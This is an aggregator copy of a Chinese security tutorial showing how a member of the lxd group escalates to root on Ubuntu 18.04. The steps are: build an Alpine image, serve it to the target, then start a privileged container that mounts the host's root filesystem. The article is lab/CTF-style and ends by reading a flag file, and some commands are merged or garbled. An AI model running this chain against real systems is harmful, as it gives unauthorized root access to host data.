看我如何利用LXD实现权限提升
source link: https://www.freebuf.com/articles/system/216803.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
*严正声明:本文仅限于技术讨论与分享,严禁用于非法途径
写在前面的话
在这篇文章中,我们将跟大家介绍如何通过利用LXD的漏洞,实现目标设备lxd组用户的提权。
通过适当的操作,本地lxd组的用户成员可以理解将自己的权限提升为主机操作系统的root权限。这种特性与该用户是否已被授权sudo权限无关,而且全程也无需用户输入密码。研究人员表示,LXD SNAP包中甚至也存在这样的漏洞。
LXD是一个root进程,它可以负责执行任意用户的LXD UNIX套接字写入访问操作。而且在某些情况下,LXD甚至都不会对调用它的用户权限进行检查和匹配,现在社区也有很多种方法可以利用LXD的这种特性来实施攻击。
其中的一项技术就是使用LXD API来将目标主机的根文件系统加载进一个容器中,而本文讨论的也是这项技术。一旦成功,攻击者就可以将低权限的用户提升为root权限,并且能够在不受任何限制的情况下访问目标系统的各种数据资源。
LXD和LXC
Linux Container(LXC)通常被认为是一种轻量级虚拟化技术,它介于Chroot和完整开发的虚拟机之间,LXC可以创建一个跟正常Linux操作系统十分接近的环境,但是不需要使用到单独的内核资源。
Linux Daemon(LXD)是一个轻量级容器管理程序,而LXD是基于LXC容器技术实现的,而这种技术之前Docker也使用过。LXD使用了稳定的LXC API来完成所有的后台容器管理工作,并且增加了REST API支持,更进一步地提升了用户体验度。
容器技术
所谓的容器技术,也就是在主机操作系统中创建一个隔离的环境,以允许某个进程或应用程序在一个不影响主操作系统以及其他进程的环境下运行。
技术实现要求
目标主机系统:Ubuntu v18.04
攻击者设备:Kali Linux或其他设备
直奔主题
接下来,我们开始操作!
大家可以看到,我们已经在主机设备中创建好了一个名叫“raj”的本地用户账号:
LXD安装与配置
执行下列命令完成LXD的安装:
apt install lxd
当然了,你还需要为LXD安装一些依赖组件:
apt install zfsutils-linux
接下来,配置“raj”用户账号,将“raj”添加进LXD组中,执行下列命令:
usermod --append --groups lxd raj
验证用户“raj”是否已是LXD组的成员:
现在我们需要配置LXD,我们可以使用命令“lxd init”来开启LXD初始化进程。在初始化的过程中,程序将会要用户选择某些配置选项,其中的大多数选项都可以直接使用默认配置。不过在后端存储选项中,我们需要选择“dir”,而不要选择“zfs”。
配置好LXD之后,你需要使用LXC创建一个容器。这里我们为“Ubuntu:18.04”创建了一个容器,并命名为了“intimate-seasnail”。配置完成之后,我们可以使用lxc list命令来查看所有可用的容器:
lxc launch ubuntu:18.04 lxc list
使用lxc exec命令即可与容器建立连接,该命令需要提供目标容器名称:
lxc exec intimate-seasnail -- /bin/bash
进入容器之后,命令行终端的Shell界面如下:
权限提升
利用LXD来实现提权需要我们能够访问目标设备的本地账号,因此我们选择使用SSH来连接并访问目标设备的本地账号。 这里需要注意的是,我们的目标用户账号必须是LXD组的组成员。
ssh [email protected]
为了将我们的用户账号提升为root权限,我们还需要为LXD创建一个镜像文件,操作步骤如下:
首先,攻击者需要在自己设备上进行如下操作:
1、通过git将构建好的alpine镜像克隆至本地; 2、执行“build -alpine”命令完成最新版本的Alpine镜像构建,此操作必须由root用户完成; 3、将tar文件发送至目标设备;
接下来,我们需要在目标设备上进行如下操作:
1、下载Alpine镜像; 2、为LXD导入镜像; 3、在新的容器环境中初始化镜像; 4、在/root目录中加载容器;
那么接下来,我们先从GitHub库下载构建好的Alpine:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
运行完上述命令之后,会在当前目录下创建一个tar.gz文件,之后我们需要将其发送至目标系统:
python -m SimpleHTTPServer
另一方面,我们还需要将alpine镜像发送至目标系统的/tmp目录中:
cd /tmp
wget http://192.168.1.107:8000/apline-v3.10-x86_64-20191008_1227.tar.gz
镜像构建完成之后,我们就可以将其以镜像的形式添加进LXD了:
lxc image import ./apline-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
使用“list”命令即可检查可用的容器列表:
lxc image list
lxc init myimage ignite -c security.privileged=true lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true lxc start ignite lxc exec ignite /bin/sh Id
进入容器之后,定位到/mnt/root即可查看目标主机设备的所有资源。运行了Bash脚本之后,我们将得到一个特殊的Shell,也就是容器的Shell。这个容器中包含了目标主机的全部资源,我们可以尝试枚举或搜索flag文件:
mnt/root/root ls flag.txt cat flag.txt
Recommend
-
79
访问的文章审核中... - FreeBuf网络安全行业门户 user 形状结合 怀...
-
73
看我如何利用打印机窃取目标系统哈希值 secist 2018-01-07 14:00:59 659350 3
-
83
看我如何利用Webhook绕过支付请求
-
43
今天给大家介绍的是一款名叫Java-Stager的工具,在该工具的帮助下,我们可以轻松地在内存中下载、编译和执行Java文件(代码)。 注意...
-
31
前言 我曾发现了D-Link路由器不同型号的多个漏洞,今天我要分享的是我最近发现的D-Link路由器的三个漏洞,综合利用这三个漏洞,可以获取D-Link路由器管理权限,实现对其成功接管。
-
11
With the release of 3.20, LXD was included into the community repository of Arch Linux in January, and has currently been sitting there h...
-
6
KubeVirt, LXD, KVM, vSphere, G8 and LDAP/AD updates in Mist v4.3 2020-05-20Today we are proud to announce Mist v4.3, the latest release of the Mist Cloud Management Platform. Mist v4.3 brings brand new support for LDAP, A...
-
5
Tutorial How To Install and Configure LXD on Ubuntu 20.04 System Tools Not...
-
4
How to deploy LXD on CentOS 7 with SnapLXD is a next generation system container manager built around a very powerful REST and offers a user experience similar to virtual machines but using Linux containers instead. LXD uses pre-made Linux im...
-
1
LXD 4.20 released [Posted November 8, 2021 by ris] The LXD team has announced the release of version 4.20...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK